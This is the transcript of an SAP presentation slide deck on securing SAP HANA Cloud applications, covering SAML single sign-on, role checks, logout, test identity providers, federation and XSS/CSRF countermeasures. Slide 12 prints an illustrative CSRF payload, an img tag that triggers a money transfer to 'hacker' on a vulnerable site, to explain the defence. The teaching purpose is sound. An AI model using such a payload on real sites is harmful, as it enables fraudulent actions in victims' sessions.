• Like
  • Save
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
901
On Slideshare
0
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
0
Comments
0
Likes
1

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Martin Raepple / Product Owner Identity and Access Management /SAP HANA Cloud Product TeamSAP HANA Cloud – Virtual BootcampSecuring SAP HANA Cloud Applications
  • 2. © 2012 SAP AG. All rights reserved. 2DisclaimerThis presentation outlines our general product direction and should not be relied on in making apurchase decision. This presentation is not subject to your license agreement or any other agreementwith SAP. SAP has no obligation to pursue any course of business outlined in this presentation or todevelop or release any functionality mentioned in this presentation. This presentation and SAPsstrategy and possible future developments are subject to change and may be changed by SAP at anytime for any reason without notice. This document is provided without a warranty of any kind, eitherexpress or implied, including but not limited to, the implied warranties of merchantability, fitness for aparticular purpose, or non-infringement. SAP assumes no responsibility for errors or omissions in thisdocument, except if such damages were caused by SAP intentionally or grossly negligent.
  • 3. © 2012 SAP AG. All rights reserved. 3Agenda Enabling Authentication Enforcing Authorizations Logout Protecting fromCommon Web Attacks Configuring localtest user and roles Using thelocal TestIdentity Provider Default IdentityFederation with SAPID Service Identity Federationwith the corporateIdentity Provider Role Assignments Demo Logging andTracing SAMLDebuggingSecureCloud ApplicationDevelopmentSecurityTroubleshootingLocal TestingTesting in theCloudIdentity and AccessManagement inthe Cloud
  • 4. Secure Cloud ApplicationDevelopment
  • 5. © 2012 SAP AG. All rights reserved. 5Enabling Authentication (1/4)High-level ArchitectureSAP HANA CloudApplication Identity Provider(IdP)SAP HANACloudDelegate authenticationand identity management+ Keep focused on the business logicDelegation to a central service (IdP)enables Single Sign-On (SSO)between multiple Cloud applicationsMature and proven security standardsfor integration with IdPThree options:• Local IdP in the SAP HANA CloudSDK  for Testing only!• SAP ID Service  „out-of-the-box“IdP in the Cloud• Your own IdP (e.g. in the corporatenetwork)++Local User StoreCentral User Store+
  • 6. © 2012 SAP AG. All rights reserved. 6Enabling Authentication (2/4)Declarative …<login-config><auth-method>FORM</auth-method></login-config><security-constraint><web-resource-collection><web-resource-name>Protected</...><url-pattern>/admin/*</url-pattern></web-resource-collection><auth-constraint><role-name>Administrator</role-name></auth-constraint></security-constraint><security-role><description>Administration users</...><role-name>Administrator</role-name></security-role>web.xml: Supported Authentication Methods: FORM Delegates authentication to the SAP IDService or another IdP according to theSecurity Assertion Markup Language(SAML) 2.0 protocol BASIC HTTP "basic" authentication schemeaccording to RFC 2617. Web browsersprompt users to enter a user name andpassword. The actual authentication isstill delegated to the SAP ID service orto a SCIM*-compliant IdP* http://tools.ietf.org/html/draft-ietf-scim-api-01
  • 7. © 2012 SAP AG. All rights reserved. 7Enabling Authentication (3/4)… and ProgrammaticString user = request.getRemoteUser();if (user != null) {response.getWriter().println("Hello, " + user);} else {LoginContext loginContext;try {loginContext = LoginContextFactory.createLoginContext("FORM");loginContext.login();response.getWriter().println("Hello, " +request.getRemoteUser());} catch (LoginException e) {e.printStackTrace();}}
  • 8. © 2012 SAP AG. All rights reserved. 8Enabling Authentication (4/4)Excursus: SAML-based Single Sign-On (SSO)1. User accesses protected web resourceon SP2. SP sends SAML Authentication Requestvia HTTP redirect to trusted IdP3. IdP authenticates the user(if not done already)4. Upon successful authentication, IdP sendsSAML Response (which includes the SAMLAssertion) to the SAML Service Pro viaHTTP POSTUser3124SAML RequestSAML Response1234Identity Provider(IdP)SAP HANA CloudApplicationSAP HANACloudTrust
  • 9. © 2012 SAP AG. All rights reserved. 9Enforcing Authorizationsprotected void doGet(HttpServletRequest request, HttpServletResponseresponse) throws ServletException, IOException {PrintWriter out = response.getWriter();if(!request.isUserInRole("Administrator")){response.sendError(403, "Logged in user does nothave role Administrator");return;} else {out.println("Hello administrator");}}
  • 10. © 2012 SAP AG. All rights reserved. 10Programmatic Logoutpublic class LogoutServlet extends HttpServlet {...LoginContext loginContext = null;if (request.getRemoteUser() != null) {try {loginContext = LoginContextFactory.createLoginContext();loginContext.logout();} catch (LoginException e) {response.getWriter().println("Logout failed. Reason: " +e.getMessage());}} else {response.getWriter().println("You have successfully loggedout.");}}
  • 11. © 2012 SAP AG. All rights reserved. 11Protecting from Common Web AttacksCross-Site Scripting (XSS) AttackThe two most important countermeasures to preventXSS attacks are to:Constrain inputEncode outputSAP HANA Cloud XSS Output Encoding LibraryString encodedFirstname = null;IXSSEncoder xssEncoder = XSSEncoder.getInstance();try {encodedFirstname =xssEncoder.encodeHTML(firstName).toString();} catch (UnsupportedEncodingException e) {e.printStackTrace();}out.println("<br>Hello, " + encodedFirstname);AttackerVulnerable CloudApplicationInfectswithmaliciousscript1Downloadspage withmaliciousscript2Victim3executes scriptin the contextof the Victim’ssession
  • 12. © 2012 SAP AG. All rights reserved. 12Protecting from Common Web AttacksCross-Site Request Forgery (XSRF) AttackAttack depends on the predictability of therequest URL to the vulnerable ApplicationA countermeasure to prevent XSRF attacks isto generate and add a token or nonce perrequest which is checked on the server-sideSAP HANA Cloud provides protection based onApache Tomcats CSRF Prevention Filter.web.xml:<filter><filter-name>CsrfFilter</filter-name><filter-class>org.apache.catalina.filters.CsrfPreventionFilter</filter-class><init-param><param-name>entryPoints</param-name><param-value>/home</param-value></init-param></filter>Attacker‘sWeb-Site<img src="http://www.webapp.com/transferMoney?account=hacker&amount=1000">1Victim‘sWeb BrowserVulnerableApplicationwww.webapp.com2JSESSIONID=abc123http://www.webapp.com/transferMoney?account=hacker&amount=1000
  • 13. Local Testing
  • 14. © 2012 SAP AG. All rights reserved. 14Configuring Test Users and Managing Roles on the Local ServerSAP HANA Cloud Eclipse Tools: Servers view  Local Server  Users tab.Local TestUsersAssigned Rolesto the selectedUser in the localServerUser Attributeand ValuesLocal Server<local_server_dir>/config_master/com.sap.security.um.provider.neo.local/neousers.jsonSAP HANA CloudApplication
  • 15. Testing in the Cloud
  • 16. © 2012 SAP AG. All rights reserved. 16Using the local Test Identity Providerneousers.jsonLocal ServerSAP HANA Cloudlocal Test IdentityProviderSAP HANA CloudApplicationTrustSAP HANACloud The local test IdP is packaged within theSAP HANA Cloud SDK. When you start thelocal server, it will start as well. Define local test IdP users and theirattributes Configuring the service provider of youraccount in SAP HANA Cloud Configuring trust on SAP HANA Cloud tothe local Test IdP Configuring trust on the local Test IdPto SAP HANA Cloud Access your application deployed onthe SAP HANA Cloud and test it againstthe local test IdP and its defined users andattributes.11223344
  • 17. Identity and AccessManagement in the Cloud
  • 18. © 2012 SAP AG. All rights reserved. 18 SAP ID Service User ID Validated E-Mail Address First Name, Last Name,Display NameDefault Identity Federation with SAP ID ServiceSAP HANA CloudApplicationSAPID ServiceSAP HANACloud+ By default, SAP HANA Cloudapplications delegates authenticationand identity management to SAP IDService. No further configuration for theTrust Relationship is required.SAP ID Service is a public, SAML 2.0-compliant Identity Provider in theCloud. It manages ~4.2 Million Users(e.g. for the SAP Community Network)With SAP ID Server, users can benefitfrom SSO to other SAP On-Demandsolutions and web sites+ SAP Public Web Sites(SAP.com, SMP) SAP Business ByDesign SAP JAM …CloudTrust + SSO~4.2 Million Users+
  • 19. © 2012 SAP AG. All rights reserved. 19Identity Federation with the corporate Identity ProviderCorporateIdPEmployeesCorporateNetworkSAP HANA CloudApplicationSAP HANACloudTrust + SSOTrust+ SSO+ SAP HANA Cloud applications candelegate authentication and identitymanagement to an existing CorporateIdP that can for example authenticateyour companys employees.Trust must be configured similar to thelocal Test IdP scenario: Configuring the service provider of youraccount in SAP HANA Cloud Configuring trust on SAP HANA Cloudto the Corporate IdP Configuring trust on the Corporate IdPto SAP HANA Cloud+ (Corporate-wide unique) User ID any User Profile Attribute from theCorp. User Directory
  • 20. © 2012 SAP AG. All rights reserved. 20Role Assignments in the CloudEmployees inDepartment Sales+ Roles allow you to control the accessto application resources in SAP HANACloudIn the Cloud, you can assign Groups orindividual users to a roleGroups are collections of roles thatallow the definition of business-levelfunctions within your account. They aresimilar to the actual business rolesexisting in an organizationSAP HANACloudGroup Sales++jdoe@acme.comRole AdministratorRoles:CRM UserAccount Owner
  • 21. DEMOSSO and Identity Federation with a corporate Identity Provider (IdP)
  • 22. Troubleshooting
  • 23. © 2012 SAP AG. All rights reserved. 23Network Protocol Analyzer• Wireshark• Fiddler• SAML Tracer (Firefox Add-In)
  • 24. © 2012 SAP AG. All rights reserved. 24SAP HANA Cloud Logscom.sap.core.jpaas.security.saml2.sp
  • 25. Online Q&A
  • 26. © 2012 SAP AG. All rights reserved. 26Questions & AnswersQ: Is there anything specific for securing REST services?A: Right now, REST clients calling services exposed by the same application from within the UI (e.g. SAP UI JavaScriptusing an OData Model) can re-use an already established logon session (e.g. via SAML2) of the user at the UI.Applications exposing (REST) services and no UI can use HTTP Basic Authentication via SSL at the moment to protectthose services. For those scenarios we plan to support the Open Authorization Framwork (OAuth) in the SAP HANACloud Platform which helps to avoid storing the username and password in the Client application.Q: So once a user is authenticated in the browser, the browser based UI could use REST services?A: Yes!
  • 27. © 2012 SAP AG. All rights reserved. 27SAP Hana Cloud Virtual Bootcamp SessionsScheduleNext upcoming bootcamp session 6th Virtual Bootcamp: Working with the HANA Cloud portalOverview of the features, capabilities and installation procedureDetails and schedule will be provided soon.At the end of each session, we will give some time for Q&A.Remarks:■ The Virtual Bootcamp sessions are scheduled for the developers of our Hana Cloud Applications partnersand the community interested in our Hana Cloud Applications partner program.■ The sessions will be recorded and provided to our Hana Cloud Partner community.
  • 28. Thank You!Contact information:Martin RaeppleSAP HANA Cloudmartin.raepple@sap.com